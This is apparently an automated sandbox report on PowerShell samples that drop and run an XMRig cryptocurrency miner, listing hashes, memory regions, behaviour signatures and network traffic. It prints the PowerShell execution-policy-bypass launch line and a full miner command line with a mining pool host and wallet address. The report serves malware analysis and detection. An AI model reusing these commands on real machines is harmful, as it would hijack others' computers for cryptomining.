SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4040-46-0x00000163AB460000-0x00000163AB480000-memory.dmp

memory/4040-47-0x00000163ACC60000-0x00000163ACC80000-memory.dmp

memory/4040-48-0x00007FF6A1300000-0x00007FF6A1F33000-memory.dmp

memory/4040-51-0x00000163ACCA0000-0x00000163ACCC0000-memory.dmp

memory/4040-50-0x00000163ACC80000-0x00000163ACCA0000-memory.dmp

memory/4040-49-0x00007FF6A1300000-0x00007FF6A1F33000-memory.dmp

memory/4728-52-0x00007FFD97880000-0x00007FFD98342000-memory.dmp

memory/4728-53-0x00007FFD97883000-0x00007FFD97885000-memory.dmp

memory/4728-54-0x00007FFD97880000-0x00007FFD98342000-memory.dmp

memory/4040-55-0x00007FF6A1300000-0x00007FF6A1F33000-memory.dmp

memory/4040-56-0x00007FF6A1300000-0x00007FF6A1F33000-memory.dmp

memory/4040-58-0x00000163ACCA0000-0x00000163ACCC0000-memory.dmp

memory/4040-57-0x00000163ACC80000-0x00000163ACCA0000-memory.dmp

memory/4040-59-0x00007FF6A1300000-0x00007FF6A1F33000-memory.dmp

memory/4040-60-0x00007FF6A1300000-0x00007FF6A1F33000-memory.dmp

memory/4040-61-0x00007FF6A1300000-0x00007FF6A1F33000-memory.dmp

memory/4040-62-0x00007FF6A1300000-0x00007FF6A1F33000-memory.dmp

memory/4040-63-0x00007FF6A1300000-0x00007FF6A1F33000-memory.dmp

memory/4040-64-0x00007FF6A1300000-0x00007FF6A1F33000-memory.dmp

memory/4040-65-0x00007FF6A1300000-0x00007FF6A1F33000-memory.dmp

memory/4040-66-0x00007FF6A1300000-0x00007FF6A1F33000-memory.dmp

memory/4040-67-0x00007FF6A1300000-0x00007FF6A1F33000-memory.dmp

memory/4040-68-0x00007FF6A1300000-0x00007FF6A1F33000-memory.dmp

memory/4040-69-0x00007FF6A1300000-0x00007FF6A1F33000-memory.dmp

memory/4040-70-0x00007FF6A1300000-0x00007FF6A1F33000-memory.dmp

memory/4040-71-0x00007FF6A1300000-0x00007FF6A1F33000-memory.dmp

memory/4040-72-0x00007FF6A1300000-0x00007FF6A1F33000-memory.dmp

memory/4040-73-0x00007FF6A1300000-0x00007FF6A1F33000-memory.dmp

memory/4040-74-0x00007FF6A1300000-0x00007FF6A1F33000-memory.dmp

memory/4040-75-0x00007FF6A1300000-0x00007FF6A1F33000-memory.dmp

memory/4040-76-0x00007FF6A1300000-0x00007FF6A1F33000-memory.dmp

memory/4040-77-0x00007FF6A1300000-0x00007FF6A1F33000-memory.dmp

memory/4040-78-0x00007FF6A1300000-0x00007FF6A1F33000-memory.dmp

memory/4040-79-0x00007FF6A1300000-0x00007FF6A1F33000-memory.dmp

memory/4040-80-0x00007FF6A1300000-0x00007FF6A1F33000-memory.dmp

memory/4040-81-0x00007FF6A1300000-0x00007FF6A1F33000-memory.dmp

memory/4040-82-0x00007FF6A1300000-0x00007FF6A1F33000-memory.dmp

memory/4040-83-0x00007FF6A1300000-0x00007FF6A1F33000-memory.dmp

memory/4040-84-0x00007FF6A1300000-0x00007FF6A1F33000-memory.dmp

memory/4040-85-0x00007FF6A1300000-0x00007FF6A1F33000-memory.dmp

memory/4040-86-0x00007FF6A1300000-0x00007FF6A1F33000-memory.dmp

memory/4040-87-0x00007FF6A1300000-0x00007FF6A1F33000-memory.dmp

memory/4040-88-0x00007FF6A1300000-0x00007FF6A1F33000-memory.dmp

memory/4040-89-0x00007FF6A1300000-0x00007FF6A1F33000-memory.dmp

memory/4040-90-0x00007FF6A1300000-0x00007FF6A1F33000-memory.dmp

memory/4040-91-0x00007FF6A1300000-0x00007FF6A1F33000-memory.dmp

memory/4040-92-0x00007FF6A1300000-0x00007FF6A1F33000-memory.dmp

memory/4040-93-0x00007FF6A1300000-0x00007FF6A1F33000-memory.dmp

memory/4040-94-0x00007FF6A1300000-0x00007FF6A1F33000-memory.dmp

memory/4040-95-0x00007FF6A1300000-0x00007FF6A1F33000-memory.dmp

memory/4040-96-0x00007FF6A1300000-0x00007FF6A1F33000-memory.dmp

memory/4040-97-0x00007FF6A1300000-0x00007FF6A1F33000-memory.dmp

memory/4040-98-0x00007FF6A1300000-0x00007FF6A1F33000-memory.dmp

memory/4040-99-0x00007FF6A1300000-0x00007FF6A1F33000-memory.dmp

memory/4040-100-0x00007FF6A1300000-0x00007FF6A1F33000-memory.dmp

memory/4040-101-0x00007FF6A1300000-0x00007FF6A1F33000-memory.dmp

memory/4040-102-0x00007FF6A1300000-0x00007FF6A1F33000-memory.dmp

memory/4040-103-0x00007FF6A1300000-0x00007FF6A1F33000-memory.dmp

memory/4040-104-0x00007FF6A1300000-0x00007FF6A1F33000-memory.dmp

memory/4040-105-0x00007FF6A1300000-0x00007FF6A1F33000-memory.dmp

memory/4040-106-0x00007FF6A1300000-0x00007FF6A1F33000-memory.dmp

memory/4040-107-0x00007FF6A1300000-0x00007FF6A1F33000-memory.dmp

memory/4040-108-0x00007FF6A1300000-0x00007FF6A1F33000-memory.dmp

memory/4040-109-0x00007FF6A1300000-0x00007FF6A1F33000-memory.dmp

memory/4040-110-0x00007FF6A1300000-0x00007FF6A1F33000-memory.dmp

memory/4040-111-0x00007FF6A1300000-0x00007FF6A1F33000-memory.dmp

memory/4040-112-0x00007FF6A1300000-0x00007FF6A1F33000-memory.dmp

memory/4040-113-0x00007FF6A1300000-0x00007FF6A1F33000-memory.dmp

memory/4040-114-0x00007FF6A1300000-0x00007FF6A1F33000-memory.dmp

memory/4040-115-0x00007FF6A1300000-0x00007FF6A1F33000-memory.dmp

memory/4040-116-0x00007FF6A1300000-0x00007FF6A1F33000-memory.dmp

memory/4040-117-0x00007FF6A1300000-0x00007FF6A1F33000-memory.dmp

Analysis: behavioral24

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 00:57

Platform

win11-20240426-en

Max time kernel

1798s

Max time network

1752s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
GB 161.35.34.195:443 tcp
US 52.111.229.48:443 tcp

Files

memory/4876-0-0x00007FFA4ADF3000-0x00007FFA4ADF5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kaudbyki.qyg.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4876-9-0x0000024EEB110000-0x0000024EEB132000-memory.dmp

memory/4876-10-0x00007FFA4ADF0000-0x00007FFA4B8B2000-memory.dmp

memory/4876-11-0x00007FFA4ADF0000-0x00007FFA4B8B2000-memory.dmp

memory/4876-12-0x00007FFA4ADF0000-0x00007FFA4B8B2000-memory.dmp

memory/4876-15-0x0000024EEB190000-0x0000024EEB19A000-memory.dmp

memory/4876-14-0x0000024EEB5F0000-0x0000024EEB602000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2576-46-0x000001B20EEA0000-0x000001B20EEC0000-memory.dmp

memory/2576-47-0x000001B2A2E50000-0x000001B2A2E70000-memory.dmp

memory/2576-48-0x00007FF669EC0000-0x00007FF66AAF3000-memory.dmp

memory/4876-49-0x00007FFA4ADF3000-0x00007FFA4ADF5000-memory.dmp

memory/2576-52-0x000001B2A34D0000-0x000001B2A34F0000-memory.dmp

memory/2576-51-0x000001B2A32A0000-0x000001B2A32C0000-memory.dmp

memory/4876-50-0x00007FFA4ADF0000-0x00007FFA4B8B2000-memory.dmp

memory/2576-53-0x00007FF669EC0000-0x00007FF66AAF3000-memory.dmp

memory/2576-54-0x00007FF669EC0000-0x00007FF66AAF3000-memory.dmp

memory/2576-55-0x00007FF669EC0000-0x00007FF66AAF3000-memory.dmp

memory/2576-57-0x000001B2A34D0000-0x000001B2A34F0000-memory.dmp

memory/2576-56-0x000001B2A32A0000-0x000001B2A32C0000-memory.dmp

memory/2576-58-0x00007FF669EC0000-0x00007FF66AAF3000-memory.dmp

memory/2576-59-0x00007FF669EC0000-0x00007FF66AAF3000-memory.dmp

memory/2576-60-0x00007FF669EC0000-0x00007FF66AAF3000-memory.dmp

memory/2576-61-0x00007FF669EC0000-0x00007FF66AAF3000-memory.dmp

memory/2576-62-0x00007FF669EC0000-0x00007FF66AAF3000-memory.dmp

memory/2576-63-0x00007FF669EC0000-0x00007FF66AAF3000-memory.dmp

memory/2576-64-0x00007FF669EC0000-0x00007FF66AAF3000-memory.dmp

memory/2576-65-0x00007FF669EC0000-0x00007FF66AAF3000-memory.dmp

memory/2576-66-0x00007FF669EC0000-0x00007FF66AAF3000-memory.dmp

memory/2576-67-0x00007FF669EC0000-0x00007FF66AAF3000-memory.dmp

memory/2576-68-0x00007FF669EC0000-0x00007FF66AAF3000-memory.dmp

memory/2576-69-0x00007FF669EC0000-0x00007FF66AAF3000-memory.dmp

memory/2576-70-0x00007FF669EC0000-0x00007FF66AAF3000-memory.dmp

memory/2576-71-0x00007FF669EC0000-0x00007FF66AAF3000-memory.dmp

memory/2576-72-0x00007FF669EC0000-0x00007FF66AAF3000-memory.dmp

memory/2576-73-0x00007FF669EC0000-0x00007FF66AAF3000-memory.dmp

memory/2576-74-0x00007FF669EC0000-0x00007FF66AAF3000-memory.dmp

memory/2576-75-0x00007FF669EC0000-0x00007FF66AAF3000-memory.dmp

memory/2576-76-0x00007FF669EC0000-0x00007FF66AAF3000-memory.dmp

memory/2576-77-0x00007FF669EC0000-0x00007FF66AAF3000-memory.dmp

memory/2576-78-0x00007FF669EC0000-0x00007FF66AAF3000-memory.dmp

memory/2576-79-0x00007FF669EC0000-0x00007FF66AAF3000-memory.dmp

memory/2576-80-0x00007FF669EC0000-0x00007FF66AAF3000-memory.dmp

memory/2576-81-0x00007FF669EC0000-0x00007FF66AAF3000-memory.dmp

memory/2576-82-0x00007FF669EC0000-0x00007FF66AAF3000-memory.dmp

memory/2576-83-0x00007FF669EC0000-0x00007FF66AAF3000-memory.dmp

memory/2576-84-0x00007FF669EC0000-0x00007FF66AAF3000-memory.dmp

memory/2576-85-0x00007FF669EC0000-0x00007FF66AAF3000-memory.dmp

memory/2576-86-0x00007FF669EC0000-0x00007FF66AAF3000-memory.dmp

memory/2576-87-0x00007FF669EC0000-0x00007FF66AAF3000-memory.dmp

memory/2576-88-0x00007FF669EC0000-0x00007FF66AAF3000-memory.dmp

memory/2576-89-0x00007FF669EC0000-0x00007FF66AAF3000-memory.dmp

memory/2576-90-0x00007FF669EC0000-0x00007FF66AAF3000-memory.dmp

memory/2576-91-0x00007FF669EC0000-0x00007FF66AAF3000-memory.dmp

memory/2576-92-0x00007FF669EC0000-0x00007FF66AAF3000-memory.dmp

memory/2576-93-0x00007FF669EC0000-0x00007FF66AAF3000-memory.dmp

memory/2576-94-0x00007FF669EC0000-0x00007FF66AAF3000-memory.dmp

memory/2576-95-0x00007FF669EC0000-0x00007FF66AAF3000-memory.dmp

memory/2576-96-0x00007FF669EC0000-0x00007FF66AAF3000-memory.dmp

memory/2576-97-0x00007FF669EC0000-0x00007FF66AAF3000-memory.dmp

memory/2576-98-0x00007FF669EC0000-0x00007FF66AAF3000-memory.dmp

memory/2576-99-0x00007FF669EC0000-0x00007FF66AAF3000-memory.dmp

memory/2576-100-0x00007FF669EC0000-0x00007FF66AAF3000-memory.dmp

memory/2576-101-0x00007FF669EC0000-0x00007FF66AAF3000-memory.dmp

memory/2576-102-0x00007FF669EC0000-0x00007FF66AAF3000-memory.dmp

memory/2576-103-0x00007FF669EC0000-0x00007FF66AAF3000-memory.dmp

memory/2576-104-0x00007FF669EC0000-0x00007FF66AAF3000-memory.dmp

memory/2576-105-0x00007FF669EC0000-0x00007FF66AAF3000-memory.dmp

memory/2576-106-0x00007FF669EC0000-0x00007FF66AAF3000-memory.dmp

memory/2576-107-0x00007FF669EC0000-0x00007FF66AAF3000-memory.dmp

memory/2576-108-0x00007FF669EC0000-0x00007FF66AAF3000-memory.dmp

memory/2576-109-0x00007FF669EC0000-0x00007FF66AAF3000-memory.dmp

memory/2576-110-0x00007FF669EC0000-0x00007FF66AAF3000-memory.dmp

memory/2576-111-0x00007FF669EC0000-0x00007FF66AAF3000-memory.dmp

memory/2576-112-0x00007FF669EC0000-0x00007FF66AAF3000-memory.dmp

memory/2576-113-0x00007FF669EC0000-0x00007FF66AAF3000-memory.dmp

memory/2576-114-0x00007FF669EC0000-0x00007FF66AAF3000-memory.dmp

memory/2576-115-0x00007FF669EC0000-0x00007FF66AAF3000-memory.dmp

memory/2576-116-0x00007FF669EC0000-0x00007FF66AAF3000-memory.dmp

Analysis: behavioral32

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 03:46

Platform

win11-20240426-en

Max time kernel

1788s

Max time network

1753s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp

Files

memory/5084-0-0x00007FFE2F4D3000-0x00007FFE2F4D5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vilkwpnv.gxi.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/5084-9-0x00000174D7C10000-0x00000174D7C32000-memory.dmp

memory/5084-10-0x00007FFE2F4D0000-0x00007FFE2FF92000-memory.dmp

memory/5084-11-0x00007FFE2F4D0000-0x00007FFE2FF92000-memory.dmp

memory/5084-12-0x00007FFE2F4D0000-0x00007FFE2FF92000-memory.dmp

memory/5084-14-0x00000174F0130000-0x00000174F0142000-memory.dmp

memory/5084-15-0x00000174F0110000-0x00000174F011A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3304-46-0x000001B5172B0000-0x000001B5172D0000-memory.dmp

memory/3304-47-0x000001B5A9880000-0x000001B5A98A0000-memory.dmp

memory/3304-48-0x00007FF7E16E0000-0x00007FF7E2313000-memory.dmp

memory/5084-49-0x00007FFE2F4D0000-0x00007FFE2FF92000-memory.dmp

memory/3304-50-0x000001B5A9CD0000-0x000001B5A9CF0000-memory.dmp

memory/3304-51-0x000001B5A9F00000-0x000001B5A9F20000-memory.dmp

memory/5084-53-0x00007FFE2F4D3000-0x00007FFE2F4D5000-memory.dmp

memory/3304-52-0x00007FF7E16E0000-0x00007FF7E2313000-memory.dmp

memory/5084-54-0x00007FFE2F4D0000-0x00007FFE2FF92000-memory.dmp

memory/3304-55-0x00007FF7E16E0000-0x00007FF7E2313000-memory.dmp

memory/3304-56-0x00007FF7E16E0000-0x00007FF7E2313000-memory.dmp

memory/3304-58-0x000001B5A9F00000-0x000001B5A9F20000-memory.dmp

memory/3304-57-0x000001B5A9CD0000-0x000001B5A9CF0000-memory.dmp

memory/3304-59-0x00007FF7E16E0000-0x00007FF7E2313000-memory.dmp

memory/3304-60-0x00007FF7E16E0000-0x00007FF7E2313000-memory.dmp

memory/3304-61-0x00007FF7E16E0000-0x00007FF7E2313000-memory.dmp

memory/3304-62-0x00007FF7E16E0000-0x00007FF7E2313000-memory.dmp

memory/3304-63-0x00007FF7E16E0000-0x00007FF7E2313000-memory.dmp

memory/3304-64-0x00007FF7E16E0000-0x00007FF7E2313000-memory.dmp

memory/3304-65-0x00007FF7E16E0000-0x00007FF7E2313000-memory.dmp

memory/3304-66-0x00007FF7E16E0000-0x00007FF7E2313000-memory.dmp

memory/3304-67-0x00007FF7E16E0000-0x00007FF7E2313000-memory.dmp

memory/3304-68-0x00007FF7E16E0000-0x00007FF7E2313000-memory.dmp

memory/3304-69-0x00007FF7E16E0000-0x00007FF7E2313000-memory.dmp

memory/3304-70-0x00007FF7E16E0000-0x00007FF7E2313000-memory.dmp

memory/3304-71-0x00007FF7E16E0000-0x00007FF7E2313000-memory.dmp

memory/3304-72-0x00007FF7E16E0000-0x00007FF7E2313000-memory.dmp

memory/3304-73-0x00007FF7E16E0000-0x00007FF7E2313000-memory.dmp

memory/3304-74-0x00007FF7E16E0000-0x00007FF7E2313000-memory.dmp

memory/3304-75-0x00007FF7E16E0000-0x00007FF7E2313000-memory.dmp

memory/3304-76-0x00007FF7E16E0000-0x00007FF7E2313000-memory.dmp

memory/3304-77-0x00007FF7E16E0000-0x00007FF7E2313000-memory.dmp

memory/3304-78-0x00007FF7E16E0000-0x00007FF7E2313000-memory.dmp

memory/3304-79-0x00007FF7E16E0000-0x00007FF7E2313000-memory.dmp

memory/3304-80-0x00007FF7E16E0000-0x00007FF7E2313000-memory.dmp

memory/3304-81-0x00007FF7E16E0000-0x00007FF7E2313000-memory.dmp

memory/3304-82-0x00007FF7E16E0000-0x00007FF7E2313000-memory.dmp

memory/3304-83-0x00007FF7E16E0000-0x00007FF7E2313000-memory.dmp

memory/3304-84-0x00007FF7E16E0000-0x00007FF7E2313000-memory.dmp

memory/3304-85-0x00007FF7E16E0000-0x00007FF7E2313000-memory.dmp

memory/3304-86-0x00007FF7E16E0000-0x00007FF7E2313000-memory.dmp

memory/3304-87-0x00007FF7E16E0000-0x00007FF7E2313000-memory.dmp

memory/3304-88-0x00007FF7E16E0000-0x00007FF7E2313000-memory.dmp

memory/3304-89-0x00007FF7E16E0000-0x00007FF7E2313000-memory.dmp

memory/3304-90-0x00007FF7E16E0000-0x00007FF7E2313000-memory.dmp

memory/3304-91-0x00007FF7E16E0000-0x00007FF7E2313000-memory.dmp

memory/3304-92-0x00007FF7E16E0000-0x00007FF7E2313000-memory.dmp

memory/3304-93-0x00007FF7E16E0000-0x00007FF7E2313000-memory.dmp

memory/3304-94-0x00007FF7E16E0000-0x00007FF7E2313000-memory.dmp

memory/3304-95-0x00007FF7E16E0000-0x00007FF7E2313000-memory.dmp

memory/3304-96-0x00007FF7E16E0000-0x00007FF7E2313000-memory.dmp

memory/3304-97-0x00007FF7E16E0000-0x00007FF7E2313000-memory.dmp

memory/3304-98-0x00007FF7E16E0000-0x00007FF7E2313000-memory.dmp

memory/3304-99-0x00007FF7E16E0000-0x00007FF7E2313000-memory.dmp

memory/3304-100-0x00007FF7E16E0000-0x00007FF7E2313000-memory.dmp

memory/3304-101-0x00007FF7E16E0000-0x00007FF7E2313000-memory.dmp

memory/3304-102-0x00007FF7E16E0000-0x00007FF7E2313000-memory.dmp

memory/3304-103-0x00007FF7E16E0000-0x00007FF7E2313000-memory.dmp

memory/3304-104-0x00007FF7E16E0000-0x00007FF7E2313000-memory.dmp

memory/3304-105-0x00007FF7E16E0000-0x00007FF7E2313000-memory.dmp

memory/3304-106-0x00007FF7E16E0000-0x00007FF7E2313000-memory.dmp

memory/3304-107-0x00007FF7E16E0000-0x00007FF7E2313000-memory.dmp

memory/3304-108-0x00007FF7E16E0000-0x00007FF7E2313000-memory.dmp

memory/3304-109-0x00007FF7E16E0000-0x00007FF7E2313000-memory.dmp

memory/3304-110-0x00007FF7E16E0000-0x00007FF7E2313000-memory.dmp

memory/3304-111-0x00007FF7E16E0000-0x00007FF7E2313000-memory.dmp

memory/3304-112-0x00007FF7E16E0000-0x00007FF7E2313000-memory.dmp

memory/3304-113-0x00007FF7E16E0000-0x00007FF7E2313000-memory.dmp

memory/3304-114-0x00007FF7E16E0000-0x00007FF7E2313000-memory.dmp

memory/3304-115-0x00007FF7E16E0000-0x00007FF7E2313000-memory.dmp

memory/3304-116-0x00007FF7E16E0000-0x00007FF7E2313000-memory.dmp

memory/3304-117-0x00007FF7E16E0000-0x00007FF7E2313000-memory.dmp